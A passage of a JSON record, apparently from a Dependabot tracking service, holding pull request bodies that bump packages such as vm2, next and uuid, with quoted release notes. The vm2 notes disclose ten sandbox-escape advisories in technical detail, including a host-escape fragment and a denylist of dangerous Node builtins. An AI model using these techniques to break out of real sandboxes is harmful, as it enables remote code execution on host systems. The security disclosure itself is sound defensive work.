\u0026gt;= 8.6\u003c/li\u003e\n\u003cli\u003eRemoved support for passing an array of brace patterns to \u003ccode\u003emicromatch.braces()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eTo strictly enforce closing brackets (for \u003ccode\u003e{\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, and \u003ccode\u003e(\u003c/code\u003e), you must now use \u003ccode\u003estrictBrackets=true\u003c/code\u003e instead of \u003ccode\u003estrictErrors\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecache\u003c/code\u003e - caching and all related options and methods have been removed\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.unixify\u003c/code\u003e was renamed to \u003ccode\u003eoptions.windows\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.nodupes\u003c/code\u003e Was removed. Duplicates are always removed by default. You can override this with custom behavior by using the \u003ccode\u003eonMatch\u003c/code\u003e, \u003ccode\u003eonResult\u003c/code\u003e and \u003ccode\u003eonIgnore\u003c/code\u003e functions.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.snapdragon\u003c/code\u003e was removed, as snapdragon is no longer used.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.sourcemap\u003c/code\u003e was removed, as snapdragon is no longer used, which provided sourcemap support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[3.0.0] - 2017-04-11\u003c/h2\u003e\n\u003cp\u003eComplete overhaul, with 36,000+ new unit tests validated against actual output generated by Bash and minimatch. More specifically, 35,000+ of the tests:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003emicromatch results are directly compared to bash results\u003c/li\u003e\n\u003cli\u003ein rare cases, when micromatch and bash disagree, micromatch's results are compared to minimatch's results\u003c/li\u003e\n\u003cli\u003emicromatch is much more accurate than minimatch, so there were cases where I had to make assumptions. I'll try to document these.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThis refactor introduces a parser and compiler that are supersets of more granular parsers and compilers from other sub-modules. Each of these sub-modules has a singular responsibility and focuses on a certain type of matching that aligns with a specific part of the Bash \u0026quot;expansion\u0026quot; API.\u003c/p\u003e\n\u003cp\u003eThese sub-modules work like plugi...\n\n_Description has been truncated_\n\n\u003c!-- This is an auto-generated comment: release notes by coderabbit.ai --\u003e\n\n## Summary by CodeRabbit\n\n## Chores\n\n* 開発用ビルドツールを最新版にアップグレードしました。ビルドプロセスのパフォーマンス改善とバグ修正が反映されます。\n\n\u003c!-- end of auto-generated comment: release notes by coderabbit.ai --\u003e","html_url":"https://github.com/geolonia/michinori.geolonia.com/pull/21","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/geolonia%2Fmichinori.geolonia.com/issues/21","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/21/packages"}},{"old_version":"4.15.1","new_version":"4.15.2","update_type":"patch","path":null,"pr_created_at":"2026-06-01T21:17:30.000Z","version_change":"4.15.1 → 4.15.2","issue":{"uuid":"4566487408","node_id":"PR_kwDOPNqpOc7hiOjQ","number":25,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 22 directories with 7 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-06-01T23:13:36.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-01T21:17:30.000Z","updated_at":"2026-06-01T23:13:38.000Z","time_to_close":6966,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":7,"packages":[{"name":"vm2","old_version":"3.9.19","new_version":"3.11.5","repository_url":"https://github.com/patriksimek/vm2"},{"name":"webpack-dev-server","old_version":"4.15.1","new_version":"4.15.2","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"next","old_version":"14.2.28","new_version":"15.5.18","repository_url":"https://github.com/vercel/next.js"},{"name":"uuid","old_version":"10.0.0","new_version":"14.0.0","repository_url":"https://github.com/uuidjs/uuid"},{"name":"vitest","old_version":"0.34.3","new_version":"4.1.0","repository_url":"https://github.com/vitest-dev/vitest"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 2 updates in the / directory: [vm2](https://github.com/patriksimek/vm2) and [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /docs/api_refs directory: [next](https://github.com/vercel/next.js).\nBumps the npm_and_yarn group with 1 update in the /docs/core_docs directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /environment_tests/test-exports-cf directory: [vitest](https://github.com/vitest-dev/vitest/tree/HEAD/packages/vitest).\nBumps the npm_and_yarn group with 1 update in the /environment_tests/test-exports-vercel directory: [next](https://github.com/vercel/next.js).\nBumps the npm_and_yarn group with 3 updates in the /examples directory: [langsmith](https://github.com/langchain-ai/langsmith-sdk), [uuid](https://github.com/uuidjs/uuid) and [axios](https://github.com/axios/axios).\nBumps the npm_and_yarn group with 3 updates in the /langchain directory: [langsmith](https://github.com/langchain-ai/langsmith-sdk), [uuid](https://github.com/uuidjs/uuid) and [axios](https://github.com/axios/axios).\nBumps the npm_and_yarn group with 2 updates in the /langchain-core directory: [langsmith](https://github.com/langchain-ai/langsmith-sdk) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-azure-dynamic-sessions directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-cerebras directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-cloudflare directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-cohere directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /libs/langchain-community directory: [langsmith](https://github.com/langchain-ai/langsmith-sdk) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-google-common directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-mcp-adapters directory: [vitest](https://github.com/vitest-dev/vitest/tree/HEAD/packages/vitest).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-mistralai directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-mongodb directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-ollama directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-pinecone directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-qdrant directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-redis directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-weaviate directory: [uuid](https://github.com/uuidjs/uuid).\n\nUpdates `vm2` from 3.9.19 to 3.11.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/patriksimek/vm2/releases\"\u003evm2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.11.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/566\"\u003e#566\u003c/a\u003e\u003c/strong\u003e — Restore \u003ccode\u003eutil.inspect\u003c/code\u003e output on Node 26+. \u003ccode\u003econsole.log(vm.run(...))\u003c/code\u003e was rendering as \u003ccode\u003eProxy(Proxy({}))\u003c/code\u003e / \u003ccode\u003eProxy(Proxy([]))\u003c/code\u003e instead of the underlying value. Triggered by Node 26's stricter handling of nested proxies in the inspector.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/567\"\u003e#567\u003c/a\u003e\u003c/strong\u003e — Restore array iteration on \u003ccode\u003evm.freeze()\u003c/code\u003e'd host arrays. Calling \u003ccode\u003e.map()\u003c/code\u003e / \u003ccode\u003e.filter()\u003c/code\u003e / \u003ccode\u003e.forEach()\u003c/code\u003e etc. inside the sandbox on a frozen host object containing arrays threw\n\u003ccode\u003eTypeError: 'isExtensible' on proxy: trap result does not reflect extensibility of proxy target\u003c/code\u003e. Regression from the 3.11.0 proxy-invariant hardening.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/pull/568\"\u003e#568\u003c/a\u003e\u003c/strong\u003e — Fix \u003ccode\u003e.node\u003c/code\u003e extension handler key in \u003ccode\u003elib/resolver.js\u003c/code\u003e (the key was \u003ccode\u003e' .node'\u003c/code\u003e with a leading space, so native addon resolution silently fell through to the default path). Thanks to \u003ca href=\"https://github.com/cherr-cc\"\u003e\u003ccode\u003e@​cherr-cc\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade Notes\u003c/h2\u003e\n\u003cp\u003eDrop-in replacement for 3.11.4. No API or configuration changes.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/patriksimek/vm2/compare/v3.11.4...v3.11.5\"\u003ehttps://github.com/patriksimek/vm2/compare/v3.11.4...v3.11.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.11.4\u003c/h2\u003e\n\u003cp\u003eTen advisories closed. Patch release — no API changes for valid configurations.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eSecurity fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-c4cf-2hgv-2qv6\u003c/strong\u003e — Bridge \u003ccode\u003eset\u003c/code\u003e trap ignoring ECMA-262 §9.5.9 \u003ccode\u003eReceiver\u003c/code\u003e, letting \u003ccode\u003eObject.create(hostObj)\u003c/code\u003e children and \u003ccode\u003eReflect.set(hostObj, k, v, custom)\u003c/code\u003e writes leak onto the host object (write-channel → RCE).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-m5q2-4fm3-vfqp\u003c/strong\u003e — Cross-realm \u003ccode\u003eSymbol.for\u003c/code\u003e namespace leak + missing dangerous-symbol guards on the bridge's write traps (\u003ccode\u003eset\u003c/code\u003e / \u003ccode\u003edefineProperty\u003c/code\u003e / \u003ccode\u003edeleteProperty\u003c/code\u003e), enabling sandbox-installed \u003ccode\u003enodejs.util.promisify.custom\u003c/code\u003e / stream brand / webstream hooks on host objects (RCE).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-v6mx-mf47-r5wg\u003c/strong\u003e — Host prototype mutation via \u003ccode\u003eFunction.prototype.{call,apply,bind}\u003c/code\u003e and \u003ccode\u003eReflect.{apply,construct}\u003c/code\u003e indirection through \u003ccode\u003eObject.prototype.__proto__\u003c/code\u003e setter, severing host intrinsic prototype chains and escaping via \u003ccode\u003ethisEnsureThis\u003c/code\u003e proto-walk fallthrough (RCE).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-q3fm-4wcw-g57x\u003c/strong\u003e — Defense Invariant \u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/11\"\u003e#11\u003c/a\u003e violation in \u003ccode\u003edefaultSandboxPrepareStackTrace\u003c/code\u003e (second variant of GHSA-9qj6-qjgg-37qq in a different file): sandbox-installed \u003ccode\u003eArray.prototype[N]\u003c/code\u003e setter / \u003ccode\u003eArray.prototype.join\u003c/code\u003e override could observe bridge-internal stack-trace state.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-76w7-j9cq-rx2j\u003c/strong\u003e — Promise species hijack in \u003ccode\u003elocalPromise\u003c/code\u003e's swallow-tail, hijacking the downstream child constructor to capture V8's internal \u003ccode\u003e(resolve, reject)\u003c/code\u003e capability and reach a raw host-realm error → host \u003ccode\u003eFunction\u003c/code\u003e (RCE).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-m4wx-m65x-ghrr\u003c/strong\u003e — NodeVM constructor patch bypass of GHSA-8hg8-63c5-gwmx: any truthy \u003ccode\u003enesting\u003c/code\u003e paired with a non-real-config \u003ccode\u003erequire\u003c/code\u003e produced a NESTING_OVERRIDE-only resolver → inner NodeVM with attacker-chosen \u003ccode\u003erequire\u003c/code\u003e → \u003ccode\u003echild_process\u003c/code\u003e RCE.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-6j2x-vhqr-qr7q\u003c/strong\u003e — WebAssembly JSPI (\u003ccode\u003eWebAssembly.promising\u003c/code\u003e / \u003ccode\u003eWebAssembly.Suspending\u003c/code\u003e, Node 24+ behind a flag, Node 26+ default) producing Promise objects with a host-realm \u003ccode\u003e[[Prototype]]\u003c/code\u003e chain and no bridge interposition; species hijack delivers a raw host-realm rejection to sandbox \u003ccode\u003e.catch\u003c/code\u003e → host \u003ccode\u003eFunction\u003c/code\u003e (RCE).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-rp36-8xq3-r6c4\u003c/strong\u003e — NodeVM builtin denylist bypass via \u003ccode\u003eprocess\u003c/code\u003e (whose \u003ccode\u003egetBuiltinModule(name)\u003c/code\u003e reloads any core module regardless of allow/deny config) and \u003ccode\u003einspector/promises\u003c/code\u003e (whose \u003ccode\u003eSession().post('Runtime.evaluate', ...)\u003c/code\u003e evaluates attacker JS in the host realm). Supersedes GHSA-947f-4v7f-x2v8.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-r9pm-gxmw-wv6p\u003c/strong\u003e — NodeVM \u003ccode\u003ebuiltin: ['*']\u003c/code\u003e wildcard exposing Node's undocumented underscored network builtins (\u003ccode\u003e_http_client\u003c/code\u003e, \u003ccode\u003e_http_server\u003c/code\u003e, \u003ccode\u003e_tls_*\u003c/code\u003e, \u003ccode\u003e_stream_*\u003c/code\u003e) even when the documented \u003ccode\u003e-http\u003c/code\u003e/\u003ccode\u003e-https\u003c/code\u003e/\u003ccode\u003e-net\u003c/code\u003e/\u003ccode\u003e-tls\u003c/code\u003e exclusions were used — SSRF-class capability bypass (CVSS 8.6).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-9g8x-92q2-p28f\u003c/strong\u003e — NodeVM builtin allowlist surfacing four process-wide observability builtins (\u003ccode\u003ediagnostics_channel\u003c/code\u003e, \u003ccode\u003easync_hooks\u003c/code\u003e, \u003ccode\u003eperf_hooks\u003c/code\u003e, \u003ccode\u003ev8\u003c/code\u003e) that read state of the entire host process rather than sandbox-local state — HTTP header / async-context / perf-mark / heap-snapshot exfiltration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eDocumentation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/blob/main/docs/ATTACKS.md\"\u003e\u003ccode\u003edocs/ATTACKS.md\u003c/code\u003e\u003c/a\u003e extended through Category 35, plus two new Defense Invariants: \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/12\"\u003e#12\u003c/a\u003e\u003c/strong\u003e (\u0026quot;No sandbox-visible object has a host-realm prototype chain without bridge interposition\u0026quot;) and \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/13\"\u003e#13\u003c/a\u003e\u003c/strong\u003e (\u0026quot;The NodeVM builtin allowlist is a closed system\u0026quot;).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade Notes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eIf you constructed \u003ccode\u003eNodeVM({ nesting: \u0026lt;truthy\u0026gt; })\u003c/code\u003e without an explicit \u003ccode\u003erequire\u003c/code\u003e config object\u003c/strong\u003e, \u003ccode\u003enew NodeVM(...)\u003c/code\u003e now throws (GHSA-m4wx-m65x-ghrr). This covers every shape that previously silently produced a \u003ccode\u003evm2\u003c/code\u003e-only resolver: omitting \u003ccode\u003erequire\u003c/code\u003e, or setting it to any falsy value (\u003ccode\u003efalse\u003c/code\u003e/\u003ccode\u003eundefined\u003c/code\u003e/\u003ccode\u003enull\u003c/code\u003e/\u003ccode\u003e0\u003c/code\u003e/\u003ccode\u003e''\u003c/code\u003e) or any truthy non-object value (\u003ccode\u003etrue\u003c/code\u003e/number/string/symbol/function); and also any truthy \u003ccode\u003enesting\u003c/code\u003e value, not only \u003ccode\u003enesting: true\u003c/code\u003e. Either drop \u003ccode\u003enesting\u003c/code\u003e, or pass an explicit \u003ccode\u003erequire\u003c/code\u003e config object (e.g. \u003ccode\u003erequire: { builtin: [] }\u003c/code\u003e) to acknowledge that vm2 will be requireable from inside the sandbox. The error message is actionable and links to the README hardening section.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNo other valid configurations are affected.\u003c/strong\u003e Embedders who explicitly listed any of \u003ccode\u003eprocess\u003c/code\u003e / \u003ccode\u003einspector\u003c/code\u003e / \u003ccode\u003eworker_threads\u003c/code\u003e / \u003ccode\u003ecluster\u003c/code\u003e / \u003ccode\u003evm\u003c/code\u003e / \u003ccode\u003erepl\u003c/code\u003e / \u003ccode\u003emodule\u003c/code\u003e / \u003ccode\u003etrace_events\u003c/code\u003e / \u003ccode\u003ewasi\u003c/code\u003e / \u003ccode\u003ediagnostics_channel\u003c/code\u003e / \u003ccode\u003easync_hooks\u003c/code\u003e / \u003ccode\u003eperf_hooks\u003c/code\u003e / \u003ccode\u003ev8\u003c/code\u003e in \u003ccode\u003ebuiltin\u003c/code\u003e were already running an unsandboxed sandbox; those names now throw at load time and can be re-introduced as safe wrappers via \u003ccode\u003emock\u003c/code\u003e / \u003ccode\u003eoverride\u003c/code\u003e / \u003ccode\u003eSPECIAL_MODULES\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/patriksimek/vm2/compare/v3.11.3...v3.11.4\"\u003ehttps://github.com/patriksimek/vm2/compare/v3.11.3...v3.11.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.11.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eSecurity fix\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/patriksimek/vm2/blob/main/CHANGELOG.md\"\u003evm2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.11.5]\u003c/h2\u003e\n\u003cp\u003ePatch release — no API changes.\u003c/p\u003e\n\u003ch3\u003eFix\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/566\"\u003e#566\u003c/a\u003e\u003c/strong\u003e — \u003ccode\u003eutil.inspect\u003c/code\u003e of \u003ccode\u003evm.run(...)\u003c/code\u003e results rendered as \u003ccode\u003eProxy(Proxy({}))\u003c/code\u003e on Node 26+. Install \u003ccode\u003enodejs.util.inspect.custom\u003c/code\u003e on host-side proxy targets so the inspect output reflects the underlying shape.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/567\"\u003e#567\u003c/a\u003e\u003c/strong\u003e — Array iteration methods on a \u003ccode\u003evm.freeze()\u003c/code\u003e-d host array threw an \u003ccode\u003e'isExtensible' on proxy\u003c/code\u003e invariant error (regression from the GHSA-grj5-jjm8-h35p species defense). Align the ReadOnly proxy target's extensibility with its trap result and skip species neutralization on the host→sandbox apply path.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[3.11.4]\u003c/h2\u003e\n\u003cp\u003eTen advisories closed. Patch release — no API changes for valid configurations.\u003c/p\u003e\n\u003ch3\u003eSecurity fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-c4cf-2hgv-2qv6\u003c/strong\u003e — bridge escape via \u003ccode\u003eBaseHandler.set\u003c/code\u003e ignoring the ECMA-262 §9.5.9 \u003ccode\u003eReceiver\u003c/code\u003e argument; \u003ccode\u003eObject.create(hostProxy).x = v\u003c/code\u003e and \u003ccode\u003eReflect.set(hostProxy, k, v, sandboxObj)\u003c/code\u003e wrote through to the host object instead of installing on the receiver, turning every embedder-exposed host object into a sandbox write channel. Receiver-gated install-on-receiver fix in \u003ccode\u003elib/bridge.js\u003c/code\u003e mirroring \u003ccode\u003eReadOnlyHandler.set\u003c/code\u003e. See ATTACKS.md Category 32 and \u003ccode\u003etest/ghsa/GHSA-c4cf-2hgv-2qv6/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-m5q2-4fm3-vfqp\u003c/strong\u003e — sandbox escape via unblocked cross-realm \u003ccode\u003eSymbol.for\u003c/code\u003e keys plus missing dangerous-symbol guards on the bridge's write traps. Two-layer structural fix: \u003ccode\u003elib/setup-sandbox.js\u003c/code\u003e denies the entire \u003ccode\u003enodejs.\u003c/code\u003e namespace at \u003ccode\u003eSymbol.for\u003c/code\u003e and aligns the read-side filters with the full 9-symbol cache, and \u003ccode\u003elib/bridge.js\u003c/code\u003e extends \u003ccode\u003eisDangerousCrossRealmSymbol\u003c/code\u003e and applies it to the \u003ccode\u003eset\u003c/code\u003e/\u003ccode\u003edefineProperty\u003c/code\u003e/\u003ccode\u003edeleteProperty\u003c/code\u003e traps. See ATTACKS.md Category 8 / Category 20 (both extended) and \u003ccode\u003etest/ghsa/GHSA-m5q2-4fm3-vfqp/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-v6mx-mf47-r5wg\u003c/strong\u003e — host prototype mutation via apply-trap indirection. Sandbox code could reach host prototype-mutating setters (\u003ccode\u003eObject.prototype.__proto__\u003c/code\u003e, \u003ccode\u003esetPrototypeOf\u003c/code\u003e, \u003ccode\u003edefineProperty\u003c/code\u003e, \u003ccode\u003e__defineSetter__\u003c/code\u003e/\u003ccode\u003e__defineGetter__\u003c/code\u003e) through \u003ccode\u003eFunction.prototype.{call,apply,bind}\u003c/code\u003e and \u003ccode\u003eReflect.{apply,construct}\u003c/code\u003e indirection, sever a host intrinsic's prototype chain, and escape via the bridge's \u003ccode\u003ethisEnsureThis\u003c/code\u003e proto-walk fallthrough. Two-layer structural fix in \u003ccode\u003elib/bridge.js\u003c/code\u003e (apply-trap blocklist + cache check before proto-walk). See ATTACKS.md Category 30 and \u003ccode\u003etest/ghsa/GHSA-v6mx-mf47-r5wg/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-q3fm-4wcw-g57x\u003c/strong\u003e — Defense Invariant \u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/11\"\u003e#11\u003c/a\u003e hardening for \u003ccode\u003edefaultSandboxPrepareStackTrace\u003c/code\u003e (second variant of GHSA-9qj6-qjgg-37qq in a different file). The sandbox stack-trace formatter accumulated frames in a sandbox-realm array and \u003ccode\u003e.join\u003c/code\u003e-ed them, so a sandbox-installed setter on \u003ccode\u003eArray.prototype[N]\u003c/code\u003e (or \u003ccode\u003e.join\u003c/code\u003e override) observed bridge-internal state — no host reference reachable today, but one enrichment away from regressing into the GHSA-9qj6 RCE shape. Fixed in \u003ccode\u003elib/setup-sandbox.js\u003c/code\u003e by folding frames through a primitive string accumulator (no \u003ccode\u003eArray.prototype\u003c/code\u003e slot reachable) and converting \u003ccode\u003emakeCallSiteGetters\u003c/code\u003e to \u003ccode\u003elocalReflectDefineProperty\u003c/code\u003e for symmetry. See ATTACKS.md Category 28 Variant B and \u003ccode\u003etest/ghsa/GHSA-q3fm-4wcw-g57x/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-76w7-j9cq-rx2j\u003c/strong\u003e — Promise species hijack in the \u003ccode\u003elocalPromise\u003c/code\u003e swallow tail. The swallow-tail \u003ccode\u003eapply(globalPromisePrototypeThen, this, [...])\u003c/code\u003e call inside \u003ccode\u003elocalPromise\u003c/code\u003e's constructor invoked the cached host \u003ccode\u003ePromise.prototype.then\u003c/code\u003e without first calling \u003ccode\u003eresetPromiseSpecies(this)\u003c/code\u003e, so a sandbox subclass overriding \u003ccode\u003e[Symbol.species]\u003c/code\u003e could redirect the downstream child constructor to a user function and capture V8's internal \u003ccode\u003e(resolve, reject)\u003c/code\u003e capability — delivering a raw host-realm error (RangeError from deep recursion + \u003ccode\u003ee.stack\u003c/code\u003e) to a sandbox collector and reaching the host \u003ccode\u003eFunction\u003c/code\u003e constructor via \u003ccode\u003e.constructor.constructor\u003c/code\u003e. One-line fix in \u003ccode\u003elib/setup-sandbox.js\u003c/code\u003e adds the missing \u003ccode\u003eresetPromiseSpecies(this)\u003c/code\u003e before the swallow-tail call, matching the pattern already used by the \u003ccode\u003e.then\u003c/code\u003e/\u003ccode\u003e.catch\u003c/code\u003e/\u003ccode\u003eReflect.apply\u003c/code\u003e overrides. See ATTACKS.md Category 31 and \u003ccode\u003etest/ghsa/GHSA-76w7-j9cq-rx2j/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-m4wx-m65x-ghrr\u003c/strong\u003e — NodeVM constructor patch bypass of GHSA-8hg8-63c5-gwmx: a truthy \u003ccode\u003enesting\u003c/code\u003e paired with anything other than a real \u003ccode\u003erequire\u003c/code\u003e config object produced a NESTING_OVERRIDE-only resolver → inner NodeVM with attacker-chosen \u003ccode\u003erequire\u003c/code\u003e → \u003ccode\u003echild_process\u003c/code\u003e RCE. Structural fix in \u003ccode\u003elib/nodevm.js\u003c/code\u003e: destructure first, then reject at construction whenever \u003ccode\u003enesting\u003c/code\u003e is truthy and \u003ccode\u003erequireOpts\u003c/code\u003e is not a non-null object or \u003ccode\u003eResolver\u003c/code\u003e. Supersedes GHSA-8hg8-63c5-gwmx. See ATTACKS.md Category 25 and \u003ccode\u003etest/ghsa/GHSA-m4wx-m65x-ghrr/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-6j2x-vhqr-qr7q\u003c/strong\u003e — sandbox escape via WebAssembly JSPI (Node 24 behind \u003ccode\u003e--experimental-wasm-jspi\u003c/code\u003e, Node 26+ default). \u003ccode\u003eWebAssembly.promising\u003c/code\u003e returns Promise objects whose \u003ccode\u003e[[Prototype]]\u003c/code\u003e chain points directly at the host realm's \u003ccode\u003ePromise.prototype\u003c/code\u003e with no bridge proxy in between, so \u003ccode\u003ep.finally()\u003c/code\u003e reaches host \u003ccode\u003ePromise.prototype.finally\u003c/code\u003e, V8's \u003ccode\u003eSpeciesConstructor\u003c/code\u003e reads an attacker-controlled \u003ccode\u003ep.constructor\u003c/code\u003e getter, and the eventual host-realm rejection is dispatched through the attacker's class with no bridge wrapping — \u003ccode\u003ee.constructor.constructor('return process')()\u003c/code\u003e then evaluates in the host realm. Structural fix in \u003ccode\u003elib/setup-sandbox.js\u003c/code\u003e: delete \u003ccode\u003eWebAssembly.promising\u003c/code\u003e and \u003ccode\u003eWebAssembly.Suspending\u003c/code\u003e at sandbox bootstrap, mirroring the existing \u003ccode\u003eWebAssembly.JSTag\u003c/code\u003e removal. Adds Defense Invariant \u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/12\"\u003e#12\u003c/a\u003e (no sandbox-visible object may have a host-realm prototype chain without bridge interposition). See ATTACKS.md Category 33 and \u003ccode\u003etest/ghsa/GHSA-6j2x-vhqr-qr7q/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-rp36-8xq3-r6c4\u003c/strong\u003e — NodeVM builtin denylist bypass via \u003ccode\u003eprocess\u003c/code\u003e and \u003ccode\u003einspector/promises\u003c/code\u003e. The exact-match denylist in \u003ccode\u003elib/builtin.js\u003c/code\u003e missed two host-passthrough families: \u003ccode\u003eprocess\u003c/code\u003e (whose \u003ccode\u003egetBuiltinModule(name)\u003c/code\u003e reloads any core module regardless of the embedder's allow/deny configuration) and \u003ccode\u003einspector/promises\u003c/code\u003e (whose \u003ccode\u003eSession().post('Runtime.evaluate', ...)\u003c/code\u003e evaluates attacker JS in the host realm). Structural fix promotes the check to family-prefix via \u003ccode\u003eisDangerousBuiltin(key)\u003c/code\u003e, strips the \u003ccode\u003enode:\u003c/code\u003e URL prefix, and adds \u003ccode\u003eprocess\u003c/code\u003e to the dangerous set — enforced at both \u003ccode\u003eBUILTIN_MODULES\u003c/code\u003e source and \u003ccode\u003eaddDefaultBuiltin\u003c/code\u003e. Supersedes GHSA-947f-4v7f-x2v8. Adds Defense Invariant \u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/13\"\u003e#13\u003c/a\u003e. See ATTACKS.md Category 21 (extended) and 